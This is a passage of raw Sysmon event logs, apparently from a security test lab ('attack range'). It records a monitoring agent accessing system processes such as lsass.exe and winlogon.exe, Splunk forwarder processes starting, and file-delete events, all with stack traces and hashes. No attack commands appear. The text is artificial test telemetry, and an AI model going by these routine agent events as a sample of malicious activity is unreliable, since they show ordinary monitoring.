Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.476{FE4C2B44-E4FE-63C7-5A06-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.143{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D15B27ECEAF8D689D211C2D53F481F80,SHA256=E8F41D0EB0A426A7001174719AC13CFE82E83BCFE6D77149E8ADD581BF8B01FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000044518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.769{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37D95DF2EA9CC0108E1242EC8A8DD3F5,SHA256=E38A2BDE60B2E7A44C69025CA8C095E9526496AE8558952ABEF5A20215DE606F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000044509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:31.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000017188Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.769{E5A8D418-E4FF-63C7-1402-00000000B002}33923976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017187Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4FF-63C7-1402-00000000B002}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017186Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017185Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:31.613{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017184Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 